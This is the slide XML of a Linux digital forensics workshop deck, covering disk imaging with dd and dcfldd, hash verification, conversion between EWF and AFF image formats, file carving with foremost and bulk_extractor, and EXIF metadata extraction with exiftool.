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269" r:id="rId4"/>
    <p:sldId id="343" r:id="rId5"/>
    <p:sldId id="345" r:id="rId6"/>
    <p:sldId id="333" r:id="rId7"/>
    <p:sldId id="344" r:id="rId8"/>
    <p:sldId id="346" r:id="rId9"/>
    <p:sldId id="355" r:id="rId10"/>
    <p:sldId id="362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75" r:id="rId22"/>
    <p:sldId id="377" r:id="rId23"/>
    <p:sldId id="334" r:id="rId24"/>
    <p:sldId id="347" r:id="rId25"/>
    <p:sldId id="378" r:id="rId26"/>
    <p:sldId id="380" r:id="rId27"/>
    <p:sldId id="348" r:id="rId28"/>
    <p:sldId id="379" r:id="rId29"/>
    <p:sldId id="352" r:id="rId30"/>
    <p:sldId id="353" r:id="rId31"/>
    <p:sldId id="356" r:id="rId32"/>
    <p:sldId id="357" r:id="rId33"/>
    <p:sldId id="358" r:id="rId34"/>
    <p:sldId id="359" r:id="rId35"/>
    <p:sldId id="360" r:id="rId36"/>
    <p:sldId id="361" r:id="rId37"/>
    <p:sldId id="363" r:id="rId38"/>
    <p:sldId id="349" r:id="rId39"/>
    <p:sldId id="350" r:id="rId40"/>
    <p:sldId id="351" r:id="rId41"/>
    <p:sldId id="381" r:id="rId42"/>
    <p:sldId id="38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602F-339E-4896-B485-917D756E423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7ADD6-C0DB-41DB-BC8B-9ED701770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E531-2634-46F1-87B7-37217CB37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509B-0364-4DC0-BE1C-C54DD0875929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1A1D-D269-4C63-8466-97ABAE1B0DE1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1D52-A914-4ACF-A7F5-1BCFC49AC7AF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C2B-936B-476A-A914-063991809155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5B39-DFDD-409C-BEDE-546A0AFECE78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BC10-927F-42FA-8CA3-E931610FE646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3DC-24AB-4F92-8296-FFEDB9A4DB70}" type="datetime1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A4E9-BCAB-47C3-BC95-55189F889D85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3BB8-87A1-4127-9BDB-82D690996BA1}" type="datetime1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58E9-FB2A-41E2-A27B-96F4362D3DAE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CDEE-2C79-4537-8E2E-E253C4E04428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BE7F-FD09-4082-B00B-4D647604FACA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7E2E-C97A-4AC8-B258-3D07B8F7E5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dracOs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Forensic Flavor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1421"/>
            <a:ext cx="6400800" cy="1752600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Satria </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Ady</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Pradana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774700" cy="54864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29200" y="3288267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600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The Workshop !!</a:t>
            </a:r>
            <a:endParaRPr lang="id-ID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Viewing Partition in Linux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rgbClr val="92D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fdisk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> –l /dev/sda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2" y="2590800"/>
            <a:ext cx="8221648" cy="30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Terminology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Image file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="id-ID" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>uplicate copy of the source disk or partition.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Dump of disk or partition.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Written to file(s), not another disk.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Raw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Image is stored as is.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Commonly stored with .dd, .img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Not compressed (the size will be same as the source disk).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Do not have metadata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Terminology (2)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Forensic Formatted Image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Has metadata to describe the image.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Has cryptographic hash to ensure integrity.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Might be compressed.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Most known and widely used format: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>EWF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AFF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Split Image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Image is separated into multiple files.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Disk Imaging (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RAW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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[1] Using dcfldd</a:t>
            </a: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rgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dcfldd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id-ID" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=/dev/sdb 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hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=md5,sha256 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hashwindow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=1G 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md5log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=$DFW/RAW/test1.md5.txt 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sha256log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=$DFW/RAW/test1.sha256.txt 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hashconv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=after conv=noerror,sync </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id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id-ID" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DFW/RAW/test1.dcfldd.dd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Hashing &amp;Verification of Integrity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Cryptographic Hash Function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Takes string input and returns a fixed-size alphanumeric string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Result is called as “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>message digest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”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Used for checking integrity.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One byte change will give different result.</a:t>
            </a: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Md5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-457200"/>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Create: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>md5sum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> A.txt &gt; A.md5.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-457200"/>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Verify: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>md5sum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> –c A.md5.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-457200"/>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>B.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>!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Sha256</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-457200"/>
            <a:r>
              <a:rPr lang="id-ID" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Create: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sha256sum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> A.txt &gt; A.md5.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-457200"/>
            <a:r>
              <a:rPr lang="id-ID" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Verify: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sha256sum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> –c A.md5.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-457200"/>
            <a:r>
              <a:rPr lang="id-ID" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>B.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>!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Ssdeep</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-457200"/>
            <a:r>
              <a:rPr lang="id-ID" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Create: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ssdeep </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>–b A.txt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A.sig.txt</a:t>
            </a:r>
            <a:endParaRPr lang="id-ID" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-457200"/>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Compare: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ssdeep </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>–bm A.sig.txt B.txt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Disk Imaging (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RAW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr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[2] dd_rescue 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dd_rescue </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dev/sdb </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$DFW/RAW/test2.dd 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md5sum </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$DFW/RAW/test2.dd &gt;  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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DFW/RAW/test2.md5.txt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sha256sum </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$DFW/RAW/test2.dd &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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DFW/RAW/test2.sha256.txt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Disk Imaging (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RAW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr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[3] dd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dd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/dev/sdb </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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DFW/RAW/test3.dd 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md5sum </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$DFW/RAW/test3.dd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;  $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DFW/RAW/test3.md5.txt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rgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sha256sum </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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DFW/RAW/test3.dd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt; $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DFW/RAW/test3.sha256.txt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Mounting RAW Disk Image?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Motivation, ex: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Run antivirus agains files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View files using native application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="id-ID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[4] mounting RAW image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fdisk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>–l $DFW/RAW/test3.dd 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mount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> –o ro,noexec,loop,offset=1024 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00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$DFW/RAW/test3.dd $DFW/mntpoint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Disk Imaging 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 smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>EWF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr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[5] Acquire to EWF E01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ewfacquire </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>–d sha256 –t $DFW/test5 /dev/sdb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ewfverify </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>–d sha256 –t $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DFW/test5.E01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ewfinfo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$DFW/EWF/test5.E01</a:t>
            </a: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[6] Convert RAW disk to EWF E01</a:t>
            </a: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ewfexport </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-f ewf –t $DFW/EWF/test6 $DFW/RAW/test3.dd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083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x-none" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>whoami?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Satria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Ady</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Pradana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id-ID" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unior Security Analyst at MII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Researcher at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>acOS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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Team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Interest in low level stuff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean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400800"/>
            <a:ext cx="2895600" cy="365125"/>
          </a:xfrm>
        </p:spPr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[7] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Convert </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>EWF to RAW disk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ewfexport </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>raw –t </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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DFW/RAW/test7.dd $DFW/EWF/test6.E01</a:t>
            </a:r>
            <a:endParaRPr lang="id-ID" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRP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Disk Imaging </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AFF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr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[8] Convert RAW disk to AFF</a:t>
            </a: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affconvert </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>–r $DFW/AFF/test8.aff $DFW/RAW/test3.dd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[9] Convert AFF to AFM</a:t>
            </a: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rgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>affconvert </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>–a afm $DFW/AFF/test8.dd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Which Image suites me?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RAW / EWF / AFF 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0x2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> File Carving &amp; Extraction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Objectives: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Understanding File System.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Extract data from disk image.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Tools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foremost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Bulk_extractor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5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Preliminary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cd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /root</a:t>
            </a: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export</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> DFW=forensic_workshop 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mkdir </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CARVING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Terminology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File Carving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Process of taking “chunks” of data out of disk images, memory dumps, packet capture.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File System</a:t>
            </a:r>
            <a:endParaRPr lang="id-ID" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRP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Methods and data structures that an operating system uses to keep track of files on a disk or partition.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Organizing files on the disk.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="id-ID" dirty="0" smtClean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File Systems?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Windows? </a:t>
            </a:r>
            <a:endParaRPr lang="id-ID" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRP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FAT, NTFS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Linux?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Ext, reiserFS, XFS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Mac?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HFS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Embedded system?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JFFS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File Carving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[x] Carving with Foremost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foremost </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$DFW/RAW/test3.dd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[x] Extracting with bulk_extractor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="id-ID" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D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bulk_extractor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>–o $DFW/CARVING $DFW/RAW/test3.dd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7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0x3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Metadata Extraction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Analysis of Image Metadata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Objectives</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: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Understanding metadata.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Obtain metadata from image.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Organization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Divided to some sections related to forensic stages.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Each section has objectives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Has background explanation if necessary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</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="249" name="Picture 51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835"/>
            <a:ext cx="764540" cy="4946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Tools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exiftool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8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Metadata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Information that characterizes data (document, pictures, music, etc).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Means of creation of the data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Purpose of data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Time and date of creation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Creator or author of the data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Device or host where data was created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Standard used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0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Metadata without context and point of reference make no sense.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be risk for privacy.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6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EXIF &amp; Image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Ex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>changeable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mage </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ile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Camera record extra data besides of actual image.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When and where picture taken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What camera used.</a:t>
            </a:r>
          </a:p>
          <a:p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4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Extracting EXIF Metadata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rgbClr val="92D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exiftool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ibiza.jpg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92D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FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exiftool</a:t>
            </a:r>
            <a:r>
